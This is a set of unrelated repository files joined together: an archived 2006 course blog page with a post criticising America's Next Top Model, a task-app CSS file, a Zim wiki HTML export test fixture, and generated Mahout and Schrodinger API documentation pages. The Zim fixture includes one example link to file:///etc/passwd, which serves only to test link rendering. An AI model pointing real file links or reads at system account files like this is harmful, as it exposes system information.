site</a></li> </ul> </td> </tr> </table> <table id="secondary-menu" summary="Navigation elements." border="0" cellpadding="0" cellspacing="0" width="100%"> <tr> <td class="secondary-links" width="75%" align="center" valign="middle"> </td> <td width="25%" align="center" valign="middle"> </td> </tr> <tr> <td colspan="2"><div></div></td> </tr> </table> <table id="content" border="0" cellpadding="15" cellspacing="0" width="100%"> <tr> <td id="sidebar-left"> <div class="block block-block" id="block-block-1"> <div class="title"><h3>About</h3></div> <div class="content"><p><a href="../../../index.html">MS 190: Authorship</a> is the course website for the Fall 2006 Media Studies senior seminar at Pomona College in Claremont, California.</p> <p><a href="../../../syllabus/index.html">Syllabus</a><br /> <a href="../8/index.html">Class information</a></p> </div> </div><div class="block block-blog" id="block-blog-0"> <div class="title"><h3>Recent blog posts</h3></div> <div class="content"><div class="item-list"><ul><li><a href="../../../node/716/index.html">Site Archived</a></li><li><a href="../../../node/715/index.html">Another YouTube Phenomenon: &quot;What Do You Love About Music&quot;</a></li><li><a href="../../../node/712/index.html">Blog Blahbla</a></li><li><a href="../../../node/711/index.html">blog about blogging</a></li><li><a href="../../../node/710/index.html">KIDS incorporated</a></li><li><a href="../../../node/709/index.html">consumer whores</a></li><li><a href="../../../node/708/index.html">HELP STALLONE</a></li><li><a href="../../../node/707/index.html">i heart youtube</a></li><li><a href="../../../node/706/index.html">COME TO MY WINDOW!</a></li><li><a href="../../../node/705/index.html">authorin&#039; is funny times</a></li></ul></div><div class="more-link"><a href="../../../blog/index.html" title="Read the latest blog entries.">more</a></div></div> </div><div class="block block-comment" id="block-comment-0"> <div class="title"><h3>Recent comments</h3></div> <div class="content"><div class="item-list"><ul><li><a href="../../../node/527/index.html#comment-576">You&#039;ve got it wrong. Yin</a><br />4 years 17 weeks ago</li><li><a href="../../../node/527/index.html#comment-575">Do you remember the title of</a><br />4 years 17 weeks ago</li><li><a href="../../../node/695/index.html#comment-550">the bubble boy</a><br />4 years 19 weeks ago</li><li><a href="../../../node/660/index.html#comment-549">mine&#039;s just a nickname...</a><br />4 years 19 weeks ago</li><li><a href="../../../node/694/index.html#comment-548">thats a great song </a><br />4 years 19 weeks ago</li><li><a href="../../../node/695/index.html#comment-547">ball and chain</a><br />4 years 19 weeks ago</li><li><a href="../../../node/708/index.html#comment-546">it very much depends</a><br />4 years 19 weeks ago</li><li><a href="../../../node/700/index.html#comment-545">video fun ya ya</a><br />4 years 19 weeks ago</li><li><a href="../../../node/692/index.html#comment-544">hahahaaa the first read</a><br />4 years 19 weeks ago</li><li><a href="../../../node/692/index.html#comment-543">oh yeah my original point</a><br />4 years 19 weeks ago</li></ul></div></div> </div> </td> <td valign="top"> <div id="main"> <div class="breadcrumb"><a href="../../../index.html">Home</a></div> <h1 class="title">Tyra Banks is obnoxious</h1> <!-- start main content --> <div class="node"> <h1 class="title"><a href="../../../node/488/index.html">Models are people too, just not when they&#039;re on TV</a></h1> <span class="submitted">Submitted by achillesheel on 19 November 2006 - 10:59pm.</span> <span class="taxonomy"><ul class="links inline"><li class="first last taxonomy_term_558"><a href="index.html" rel="tag" title="" class="taxonomy_term_558 active">Tyra Banks is obnoxious</a></li> </ul></span> <div class="content"><p>So in lieu of doing anything productive on a Sunday night (they're sacred, right?), I watched America's Next Top Model. I obviously wasn't expecting anything substantial, culturally aware, or even entertaining - just something to kill time. But it's deliberate avoidance of any of these ideas was incredible. </p> <p>In just one episode, a girl admitted to having attempted suicide, and a Spanish guy told one of the models that he "didn't like black girls." Meanwhile we are supposed to be focused on the trials of the competition: "Nobody thinks I want this bad enough," "I don't feel pretty enough," "No one thinks models feel." The suicide attempt confession was blurted out during one of the "challenges" and after the shocked reaction shots, no one bothered ot mention it again. Except for saying that she was really brave and strong, it was a non-issue or even plotline in the show. She won the challenge for being so strong and brave.. and cut to her on One Tree Hill as a guest star. Whoo - suicide attempts make you a strong person with more emotion to tap into when you're acting.</p> </div> <div class="links">&raquo; <ul class="links inline"><li class="first blog_usernames_blog"><a href="../../../blog/7/index.html" title="Read achillesheel&#039;s latest blog entries." class="blog_usernames_blog">achillesheel&#039;s blog</a></li> <li class="last node_read_more"><a href="../../../node/488/index.html" title="Read the rest of this posting." class="node_read_more">Read more</a></li> </ul></div> </div> <!-- end main content --> </div><!-- main --> </td> <td id="sidebar-right"> <div class="block block-block" id="block-block-2"> <div class="title"><h3>Links</h3></div> <div class="content"><p>blogs about electronic writing, reading, and publishing:</p> <ul> <li><a href="http://grandtextauto.gatech.edu/" target="_blank">Grand Text Auto</a></li> <li><a href="http://www.futureofthebook.com/blog" target="_blank">if:book</a></li> <li><a href="http://www.jilltxt.net" target="_blank">jill/txt</a></li> <li><a href="http://misc.wordherders.net/" target="_blank">Miscellany is the Largest Category</a></li> </ul> <p></p> <p>other interesting academic blogs:</p> <ul> <li><a href="http://www.michaelberube.com/index.php" target="_blank">Michael Bérubé</a></li> <li><a href="http://bitchphd.blogspot.com/" target="_blank">Bitch, PhD</a></li> <li><a href="http://www.itofisher.com/mito/" target="_blank">Mimi Ito</a></li> <li><a href="http://www.henryjenkins.org/" target="_blank">Henry Jenkins</a></li> <li><a href="http://chutry.wordherders.net/" target="_blank">Chuck Tryon</a></li> <li><a href="http://www.thevalve.org/go" target="_blank">The Valve</a></li> </ul> <p></p> <p>personal blogs everyone should read:</p> <ul> <li><a href="http://www.dooce.com/" target="_blank">Dooce</a></li> <li><a href="http://www.alittlepregnant.com/alittlepregnant/" target="_blank">A Little Pregnant</a></li> <li><a href="http://tinycatpants.squarespace.com/journal/" target="_blank">Tiny Cat Pants</a></li> </ul> <p></p> <p>blogs about authorship, on some level, at least:</p> <ul> <li><a href="http://belledejour-uk.blogspot.com/" target="_blank">Belle de Jour</a></li> </ul> <p><a href="mailto:kfitzpatrickATpomonaDOTedu">suggest a link</a></p> </div> </div> </td> </tr> </table> <table id="footer-menu" summary="Navigation elements." border="0" cellpadding="0" cellspacing="0" width="100%"> <tr> <td align="center" valign="middle"> <div class="primary-links"> <ul class="links"><li class="first menu-1-1-2"><a href="http://machines.plannedobsolescence.net" class="menu-1-1-2">kathleen fitzpatrick</a></li> <li class="last menu-1-2-2"><a href="http://sakai.claremont.edu/portal/site/CX_mtg_23932" class="menu-1-2-2">course sakai site</a></li> </ul> </div> </td> </tr> </table> <div id="footer-message"> <p><a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/2.5/"><img alt="Creative Commons License" border="0" src="http://creativecommons.org/images/public/somerights20.png" /></a><br />This work is licensed under a <a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/2.5/">Creative Commons Attribution-NonCommercial-ShareAlike 2.5 License</a>. </p> </div> </body> </html> <!-- Localized -->
stylesheets/cloudtasks.css
niksilver/Cloud-Tasks
/* Copyright (C) Nik Silver 2010. See licence.txt for terms and conditions not explicitly stated elsewhere. */ /* -------------------- Basic task list formatting ------------- */ #TaskList .task { background: url(../images/list-separator-light.png) repeat-x 0% 100%; } #TaskList .task-due { color: #1f75bf; font-size: 14px; vertical-align: middle; padding: 6px 12px 7px 6px; text-align: left; float: right; } #TaskList .task-name { font-size: 16px; vertical-align: middle; padding: 6px 6px 7px 12px; } /* ----------------- Recurrence symbols ------------------ */ #TaskList .task-name img { display: none; } #TaskList .task-name.has-rrule-true.has-rrule-problem-false img.recurring-symbol { display: inline; vertical-align: baseline; } #TaskList .task-name.has-rrule-problem-true img.warning-symbol { display: inline; vertical-align: baseline; } /* ----------------- Due and overdue tasks -------------- */ #TaskList .due-false .task-name { color: #666; } #TaskList .overdue-true .task-due { color: #c00; } /* ---------------- When a task is tapped ------------- */ #TaskList .task.selected { background-color: #666; } #TaskList .task.selected .task-name, #TaskList .task.selected .task-due { color: #fff; } /* --------- Network activity indicator (initial settings) -------- */ #NetworkIndicator { background-image: none; background-repeat: no-repeat; height: 26px; width: 26px; margin-top: 12px; } /* ----------------- Task list header ----------------- */ #NetworkIndicator { float: right; } #TaskListHeader { text-align: left; } /* ----------------- Auth instructions ----------------- */ #AuthInstructions { display: none; padding-top: 3em; padding-left: 24px; padding-right: 24px; text-align: left; color: #666; font-style: italic; font-size: 22px; } /* ----- Edit task recurrence note (instructions and problem warning) ----- */ #TaskRecurrenceRow { background: none; } #TaskRecurrenceNote { color: #666; font-size: 14px; margin-top: 8px; margin-bottom: -6px; float: right; } #TaskRecurrenceNote-instructions, #TaskRecurrenceNote-warning { /* Don't display by default, or it will show * briefly during the transition. */ display: none; } #TaskRecurrencePaddingRow { min-height: 14px; } /* ---------- Edit task buttons invisible by default ------------ */ #DeleteTask, #CancelTask, #CompleteTask { display: none; } /* ---------- Edit task due date display ------------ */ .has-no-due-date { color: #666; } /* ---------------- Due date dialog --------------- */ #calendar-header { font-size: 24px; margin-bottom: 10px; } #calendar #month-back, #calendar #month-forward { float: left; font-weight: bold; font-size: 36px; margin-left: 8px; margin-right: 8px; margin-top: -10px; } #calendar #month-back { font-weight: bold; } #calendar #month-forward { float: right; } #calendar #month-name { text-align: center; } #calendar #calendar-grid { width: 100%; font-size: 20px; border-spacing: 0px; padding-bottom: 20px; } #calendar #calendar-grid td { text-align: center; padding: 0px; } #calendar #days td { padding-bottom: 6px; } #calendar #calendar-grid .date-not-in-month { color: #666; } #calendar #date-row-1 .date-is-weekend { background-color: #d4d4d4; } #calendar #date-row-2 .date-is-weekend { background-color: #d0d0d0; } #calendar #date-row-3 .date-is-weekend { background-color: #cccccc; } #calendar #date-row-4 .date-is-weekend { background-color: #c8c8c8; } #calendar #date-row-5 .date-is-weekend { background-color: #c3c3c3; } #calendar #date-row-6 .date-is-weekend { background-color: #bebebe; } #calendar #calendar-grid .date-is-today { color: #800; } #calendar div.cell { border-width: 1px; -webkit-border-image: url(../images/cell-8x8.png) 1 1 1 1 repeat repeat; } #calendar div.top-cell { border-width: 2px 1px 1px 1px; -webkit-border-image: url(../images/top-cell-8x8.png) 2 1 1 1 repeat repeat; } #calendar div.left-cell { border-width: 1px 1px 1px 1px; -webkit-border-image: url(../images/left-cell-8x8.png) 1 1 1 1 repeat repeat; } #calendar div.top-left-cell { border-width: 2px 1px 1px 1px; -webkit-border-image: url(../images/top-left-cell-8x8.png) 2 1 1 1 repeat repeat; } #calendar div.bottom-cell { border-width: 1px 1px 2px 1px; -webkit-border-image: url(../images/bottom-cell-8x8.png) 1 1 2 1 repeat repeat; } #calendar div.bottom-left-cell { border-width: 1px 1px 2px 1px; -webkit-border-image: url(../images/bottom-left-cell-8x8.png) 1 1 2 1 repeat repeat; } #calendar #calendar-grid .selected, /* Selected by touch */ #calendar #calendar-grid .date-is-selected /* Selected as due date in task */ { color: #fff; background-color: #666; font-weight: bold; } #calendar #calendar-grid .date-is-today.selected, /* Today selected by touch */ #calendar #calendar-grid .date-is-today.date-is-selected /* Today selected as due date in task */ { color: #faa; } /* ----------------- Auth scene ----------------- */ .blurb { padding: 8px 8px 8px 8px; }
tests/data/formats/export.html
Osndok/zim-desktop-wiki
<h1>Head 1</h1> <p> Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do<br> eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim<br> ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut<br> aliquip ex ea commodo consequat. Duis aute irure dolor in<br> reprehenderit in voluptate velit esse cillum dolore eu fugiat<br> nulla pariatur. Excepteur sint occaecat cupidatat non proident,<br> sunt in culpa qui officia deserunt mollit anim id est laborum. </p> <p> <div style='padding-left: 30pt'> Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do<br> eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim<br> ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut<br> aliquip ex ea commodo consequat. Duis aute irure dolor in<br> reprehenderit in voluptate velit esse cillum dolore eu fugiat<br> nulla pariatur. Excepteur sint occaecat cupidatat non proident,<br> sunt in culpa qui officia deserunt mollit anim id est laborum. </div> </p> <h2>head 2</h2> <br> <p> <b>bold</b>, <i>italic</i> and <u>underline</u> and <tt>verbatim</tt><br> and also <s>strike through</s> </p> <p> This is not formatted: *bold*, /italic/ / * *^%#@#$#!@)_!)_ &amp; &lt;&gt; "" </p> <p> Some sub- and superscript like x<sup>2</sup> and H<sub>2</sub>O </p> <p> And some empty space here: </p> <br> <br> <h3>head 3</h3> <p> <a href="foo" title="foo" class="page">foo</a> links to page in the current namespace or parents<br> <a href=":foo" title=":foo" class="page">:foo</a> links to page in the root namespace<br> <a href="+foo" title="+foo" class="page">+foo</a> links to page in a subnamespace<br> <a href="foo" title="bar" class="page">bar</a> links to "foo" but display "bar" </p> <p> <a href=":foo:bar" title=":foo:bar" class="page">:foo:bar</a> <a href="./file.png" title="./file.png" class="file">./file.png</a> <a href="file:///etc/passwd" title="file:///etc/passwd" class="file">file:///etc/passwd</a><br> <a href="Foo" title="Foo" class="page">Foo</a><a href="Bar" title="Bar" class="page">Bar</a> </p> <p> <a href="mailto:foo@bar.org" title="mailto:foo@bar.org" class="mailto">mailto:foo@bar.org</a><br> <a href="interwiki:wp?Test" title="wp?Test" class="interwiki">wp?Test</a> </p> <p> External links like <a href="http://nongnu.org" title="http://nongnu.org" class="http">http://nongnu.org</a> and <a href="mailto:foo@bar.org" title="foo@bar.org" class="mailto">foo@bar.org</a> are also supported </p> <p> [not:a:link] </p> <br> <p> <img src="./foobar.png"><br> <img src="./foobar.png" height="50"><br> <img src="../my-image.png" alt="Foo Bar" width="600"><br> <a href="Foo"><img src="my-image.png"></a><br> <a href=":foo:bar"><img src="../my-image.png" alt="Foo Bar" width="600"></a> </p> <p> <img src="./equation001.png"> This equation has a source .tex file<br> <img src="./equation002.png"> for this one it is missing </p> <p> {./Not/an/image.png} </p> <p> Tags: <span class="zim-tag">@foo</span> <span class="zim-tag">@bar</span> </p> <br> <h4>head 4</h4> <br> <p> <ul> <li>item 1</li> <li>item 2</li> <li>item 3 <ul> <li>item a</li> <li>item b</li> </ul> </li> <li>item 4</li> </ul> </p> <br> <p> Indented list:<br> <ul style='padding-left: 30pt'> <li>item 1</li> <li>item 2</li> <li>item 3 <ul> <li>item a</li> <li>item b</li> </ul> </li> <li>item 4</li> </ul> </p> <br> <p> TODO list:<br> <ul> <li class="unchecked-box">foo</li> <li class="checked-box">bar <ul> <li class="checked-box">sub item 1 <ul> <li>Some normal bullet</li> </ul> </li> <li class="checked-box">sub item 2</li> </ul> </li> <li class="xchecked-box">baz</li> </ul> </p> <p> <ul> <li class="migrated-box">Migrated checkbox</li> </ul> </p> <p> A numbered list:<br> <ol type="1" start="1"> <li>foo</li> <li>bar <ol type="a" start="1"> <li>sub list</li> <li>here</li> </ol> </li> <li>hmmm</li> </ol> </p> <br> <p> Start with number other that 1/a/A </p> <p> <ol type="A" start="3"> <li>foo</li> <li>bar <ol type="1" start="3"> <li>sub item start with 3</li> </ol> </li> <li>baz</li> </ol> </p> <h5>head 5</h5> <p> <i>some verbatim blocks</i>: </p> <pre> Sing, O goddess, the rage of Achilles son of Peleus, that brought countless ills upon the Achaeans. </pre> <pre style='padding-left: 30pt'> Sing, O goddess, the rage of Achilles son of Peleus, that brought countless ills upon the Achaeans. </pre> <pre style='padding-left: 30pt'> def foo(self, bar, baz): '''Some doc string here @param bar: value for bar @param baz: value for baz @returns: foo ''' returen "foo" + bar % baz </pre> <h2>Internationalization</h2> <br> <h3>中文</h3> <p> This section has a chinese heading </p> <p> Lines below are in right to left script: </p> <p dir='rtl'> חדו"א<br> מד"ר<br> מכניקת מוצקים 2<br> A line in English, should be left aligned.<br> דינמיקה </p> <p> aaa </p> <br> <h2>Some Objects</h2> <br> <div class="zim-object"> <pre> def dump(): for i in range(1, 5): print i </pre> </div> <br> <div class="zim-object"> <pre> Sing, O goddess, the rage of Achilles son of Peleus, that brought countless ills upon the Achaeans. </pre> </div> <h2>A table</h2> <br> <table> <thead><tr> <th align="center">H1</th> <th align="right">H2 h2</th> <th align="left">H3</th> </tr></thead> <tr> <td align="center">Column A1</td> <td align="right">Column A2</td> <td align="left">a</td> </tr> <tr> <td align="center">a very long cell</td> <td align="right"><b>bold text</b></td> <td align="left">b</td> </tr> <tr> <td align="center">hyperlinks</td> <td align="right"><a href="interwiki:wp?wiki" title="wp?wiki" class="interwiki">wp?wiki</a></td> <td align="left"><a href="http://x.org" title="Xorg" class="http">Xorg</a></td> </tr> </table> <p> ====<br> This is not a header </p> <p> That's all ... </p>
sites/all/libraries/mahout/docs/mahout-utils/org/apache/mahout/utils/vectors/arff/class-use/ARFFVectorIterable.html
front/commerce
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!--NewPage--> <HTML> <HEAD> <!-- Generated by javadoc (build 1.6.0_24) on Sat May 28 14:11:57 BST 2011 --> <META http-equiv="Content-Type" content="text/html; charset=UTF-8"> <TITLE> Uses of Class org.apache.mahout.utils.vectors.arff.ARFFVectorIterable (Mahout Utilities 0.5 API) </TITLE> <META NAME="date" CONTENT="2011-05-28"> <LINK REL ="stylesheet" TYPE="text/css" HREF="../../../../../../../stylesheet.css" TITLE="Style"> <SCRIPT type="text/javascript"> function windowTitle() { if (location.href.indexOf('is-external=true') == -1) { parent.document.title="Uses of Class org.apache.mahout.utils.vectors.arff.ARFFVectorIterable (Mahout Utilities 0.5 API)"; } } </SCRIPT> <NOSCRIPT> </NOSCRIPT> </HEAD> <BODY BGCOLOR="white" onload="windowTitle();"> <HR> <!-- ========= START OF TOP NAVBAR ======= --> <A NAME="navbar_top"><!-- --></A> <A HREF="#skip-navbar_top" title="Skip navigation links"></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY=""> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_top_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY=""> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../../org/apache/mahout/utils/vectors/arff/ARFFVectorIterable.html" title="class in org.apache.mahout.utils.vectors.arff"><FONT CLASS="NavBarFont1"><B>Class</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Use</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> </EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;PREV&nbsp; &nbsp;NEXT</FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../../../../../index.html?org/apache/mahout/utils/vectors/arff//class-useARFFVectorIterable.html" target="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="ARFFVectorIterable.html" target="_top"><B>NO FRAMES</B></A> &nbsp; &nbsp;<SCRIPT type="text/javascript"> <!-- if(window==top) { document.writeln('<A HREF="../../../../../../../allclasses-noframe.html"><B>All Classes</B></A>'); } //--> </SCRIPT> <NOSCRIPT> <A HREF="../../../../../../../allclasses-noframe.html"><B>All Classes</B></A> </NOSCRIPT> </FONT></TD> </TR> </TABLE> <A NAME="skip-navbar_top"></A> <!-- ========= END OF TOP NAVBAR ========= --> <HR> <CENTER> <H2> <B>Uses of Class<br>org.apache.mahout.utils.vectors.arff.ARFFVectorIterable</B></H2> </CENTER> No usage of org.apache.mahout.utils.vectors.arff.ARFFVectorIterable <P> <HR> <!-- ======= START OF BOTTOM NAVBAR ====== --> <A NAME="navbar_bottom"><!-- --></A> <A HREF="#skip-navbar_bottom" title="Skip navigation links"></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY=""> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_bottom_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY=""> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../../org/apache/mahout/utils/vectors/arff/ARFFVectorIterable.html" title="class in org.apache.mahout.utils.vectors.arff"><FONT CLASS="NavBarFont1"><B>Class</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Use</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> </EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;PREV&nbsp; &nbsp;NEXT</FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../../../../../index.html?org/apache/mahout/utils/vectors/arff//class-useARFFVectorIterable.html" target="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="ARFFVectorIterable.html" target="_top"><B>NO FRAMES</B></A> &nbsp; &nbsp;<SCRIPT type="text/javascript"> <!-- if(window==top) { document.writeln('<A HREF="../../../../../../../allclasses-noframe.html"><B>All Classes</B></A>'); } //--> </SCRIPT> <NOSCRIPT> <A HREF="../../../../../../../allclasses-noframe.html"><B>All Classes</B></A> </NOSCRIPT> </FONT></TD> </TR> </TABLE> <A NAME="skip-navbar_bottom"></A> <!-- ======== END OF BOTTOM NAVBAR ======= --> <HR> Copyright &#169; 2008-2011 <a href="http://www.apache.org/">The Apache Software Foundation</a>. All Rights Reserved. </BODY> </HTML>
Schrodinger/Schrodinger_2012_docs/python_api/api/schrodinger.application.desmond.antlr3.dfa-module.html
platinhom/ManualHom
<?xml version="1.0" encoding="ascii"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>schrodinger.application.desmond.antlr3.dfa</title> <link rel="stylesheet" href="epydoc.css" type="text/css" /> <script type="text/javascript" src="epydoc.js"></script> </head> <body bgcolor="white" text="black" link="blue" vlink="#204080" alink="#204080"> <!-- ==================== NAVIGATION BAR ==================== --> <table class="navbar" border="0" width="100%" cellpadding="0" bgcolor="#a0c0ff" cellspacing="0"> <tr valign="middle"> <!-- Home link --> <th>&nbsp;&nbsp;&nbsp;<a href="schrodinger-module.html">Home</a>&nbsp;&nbsp;&nbsp;</th> <!-- Tree link --> <th>&nbsp;&nbsp;&nbsp;<a href="module-tree.html">Trees</a>&nbsp;&nbsp;&nbsp;</th> <!-- Index link --> <th>&nbsp;&nbsp;&nbsp;<a href="identifier-index.html">Indices</a>&nbsp;&nbsp;&nbsp;</th> <!-- Help link --> <th>&nbsp;&nbsp;&nbsp;<a href="help.html">Help</a>&nbsp;&nbsp;&nbsp;</th> <!-- Project homepage --> <th class="navbar" align="right" width="100%"> <table border="0" cellpadding="0" cellspacing="0"> <tr><th class="navbar" align="center" >Suite 2012 Schrodinger Python API</th> </tr></table></th> </tr> </table> <table width="100%" cellpadding="0" cellspacing="0"> <tr valign="top"> <td width="100%"> <span class="breadcrumbs"> <a href="schrodinger-module.html">Package&nbsp;schrodinger</a> :: <a href="schrodinger.application-module.html">Package&nbsp;application</a> :: <a href="schrodinger.application.desmond-module.html">Package&nbsp;desmond</a> :: <a href="schrodinger.application.desmond.antlr3-module.html">Package&nbsp;antlr3</a> :: Module&nbsp;dfa </span> </td> <td> <table cellpadding="0" cellspacing="0"> <!-- hide/show private --> <tr><td align="right"><span class="options">[<a href="javascript:void(0);" class="privatelink" onclick="toggle_private();">hide&nbsp;private</a>]</span></td></tr> <tr><td align="right"><span class="options" >[<a href="frames.html" target="_top">frames</a >]&nbsp;|&nbsp;<a href="schrodinger.application.desmond.antlr3.dfa-module.html" target="_top">no&nbsp;frames</a>]</span></td></tr> </table> </td> </tr> </table> <!-- ==================== MODULE DESCRIPTION ==================== --> <h1 class="epydoc">Module dfa</h1><p class="nomargin-top"></p> <p>ANTLR3 runtime package</p> <!-- ==================== CLASSES ==================== --> <a name="section-Classes"></a> <table class="summary" border="1" cellpadding="3" cellspacing="0" width="100%" bgcolor="white"> <tr bgcolor="#70b0f0" class="table-header"> <td colspan="2" class="table-header"> <table border="0" cellpadding="0" cellspacing="0" width="100%"> <tr valign="top"> <td align="left"><span class="table-header">Classes</span></td> <td align="right" valign="top" ><span class="options">[<a href="#section-Classes" class="privatelink" onclick="toggle_private();" >hide private</a>]</span></td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <a href="schrodinger.application.desmond.antlr3.dfa.DFA-class.html" class="summary-name">DFA</a><br /> @brief A DFA implemented as a set of transition tables. </td> </tr> </table> <!-- ==================== VARIABLES ==================== --> <a name="section-Variables"></a> <table class="summary" border="1" cellpadding="3" cellspacing="0" width="100%" bgcolor="white"> <tr bgcolor="#70b0f0" class="table-header"> <td colspan="2" class="table-header"> <table border="0" cellpadding="0" cellspacing="0" width="100%"> <tr valign="top"> <td align="left"><span class="table-header">Variables</span></td> <td align="right" valign="top" ><span class="options">[<a href="#section-Variables" class="privatelink" onclick="toggle_private();" >hide private</a>]</span></td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <a name="__package__"></a><span class="summary-name">__package__</span> = <code title="'schrodinger.application.desmond.antlr3'"><code class="variable-quote">'</code><code class="variable-string">schrodinger.application.desmond.antlr3</code><code class="variable-quote">'</code></code> </td> </tr> </table> <!-- ==================== NAVIGATION BAR ==================== --> <table class="navbar" border="0" width="100%" cellpadding="0" bgcolor="#a0c0ff" cellspacing="0"> <tr valign="middle"> <!-- Home link --> <th>&nbsp;&nbsp;&nbsp;<a href="schrodinger-module.html">Home</a>&nbsp;&nbsp;&nbsp;</th> <!-- Tree link --> <th>&nbsp;&nbsp;&nbsp;<a href="module-tree.html">Trees</a>&nbsp;&nbsp;&nbsp;</th> <!-- Index link --> <th>&nbsp;&nbsp;&nbsp;<a href="identifier-index.html">Indices</a>&nbsp;&nbsp;&nbsp;</th> <!-- Help link --> <th>&nbsp;&nbsp;&nbsp;<a href="help.html">Help</a>&nbsp;&nbsp;&nbsp;</th> <!-- Project homepage --> <th class="navbar" align="right" width="100%"> <table border="0" cellpadding="0" cellspacing="0"> <tr><th class="navbar" align="center" >Suite 2012 Schrodinger Python API</th> </tr></table></th> </tr> </table> <table border="0" cellpadding="0" cellspacing="0" width="100%%"> <tr> <td align="left" class="footer"> Generated by Epydoc 3.0.1 on Tue Sep 25 02:22:40 2012 </td> <td align="right" class="footer"> <a target="mainFrame" href="http://epydoc.sourceforge.net" >http://epydoc.sourceforge.net</a> </td> </tr> </table> <script type="text/javascript"> <!-- // Private objects are initially displayed (because if // javascript is turned off then we want them to be // visible); but by default, we want to hide them. So hide // them unless we have a cookie that says to show them. checkCookie(); // --> </script> </body> </html>
Coding/Python/scipy-html-0.16.1/generated/scipy.linalg.sinhm.html
platinhom/ManualHom
